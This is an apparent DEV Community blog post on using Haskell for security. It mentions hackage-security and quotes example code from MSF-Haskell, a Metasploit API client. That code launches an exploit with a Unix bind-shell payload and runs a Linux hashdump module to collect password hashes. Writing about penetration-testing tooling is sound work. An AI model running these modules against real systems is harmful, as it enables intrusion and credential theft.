DEV Community

Paula
Paula

Posted on

Security with Haskell

From "you are crazy" to "why even?" are some of the things my friends in the computer science environment have told me when I started working with Haskell in general and security in particular. Answering in order, yes I'm crazy but not because of Haskell and well, there's a reason why I chose to use Haskell for security. First of all, functional programming is the new black and probably more and more apps will be build using it. Choosing a pure functional language for security is not that crazy. On the other hand, the mathematical approaching Haskell has is very useful in cryptography.

So, how can I use Haskell for auditoring security?

I'd like to point here to an specific library called hackage-security which, currently supports only index signing. As described in the wiki, The library has two main entry points: Hackage.Security.Client is the main entry point for clients, and Hackage.Security.Server is the main entry point for servers. It is worth a check.

Apart from this, there's also a repository in github called MSF-Haskell that allows performing Penetration testing with haskell. It also includes a script in haskell as an example, and the whole whitepaper, too. It's actually an implementation of the Metasploit API which makes developers able to write Haskell clients that communicate with the Metasploit server. For example, in the part of the example script, launches an example exploit against a target host.

launchExploit :: (LoudCxt s) => Host Attackable -> MSF s ()
launchExploit targetHost = do
  _ <- module_execute metasploitableModuleType metasploitableModuleName
      $ toObject
      $ Map.fromList
          [ ("RHOST",   toObject targetHost)
          , ("PAYLOAD", toObject metasploitablePayload)
          ]
  return ()
Enter fullscreen mode Exit fullscreen mode

And we previously defined the payload itself:

metasploitablePayload = Payload "cmd/unix/bind_perl"
Enter fullscreen mode Exit fullscreen mode

Or this part for grabbing password hashes:

gatherCredentials :: (LoudCxt s) => SessionId -> MSF s ()
gatherCredentials sessionId = do
  let modTyp = PostModuleType
      modNm = ModuleName "linux/gather/hashdump"

  r <- module_execute modTyp modNm
      $ toObject
      $ Map.fromList
          [ ("SESSION",   toObject sessionId)
          ]
  case r of
    (ExecJobId j) -> waitJob j
    _             -> return ()
Enter fullscreen mode Exit fullscreen mode

To sum up, Haskell could be an option for functional scripting in security. Maybe good_option, you know, just an option or nothing, haha functional joke, badum tss.

Anyway these are brand new type of attacks! even from a scratch, and not using API's implementations such as before described. Speaking about crypto, this repo is interesting, as it handles elliptic curves encryption. Welp, I invite you all to take a look to cryptography repos in the official Haskell web, as well as the security repos. I'm still investigating, so if anyone is working on the same field here, please provide more info!

Top comments (2)

Collapse
 
_gdelgado profile image
Gio

I don't quite understand why anyone would question the use of Haskell for security. The characteristics of haskell (purity, strict typesystem, abstraction, and more) make it a great candidate for security analysis / research.

Using JavaScript for security analysis / research, on the other hand, would be insane.

Collapse
 
ondrj profile image
Ondřej • Edited

Absolutely, purely functional languages go with security hand in hand.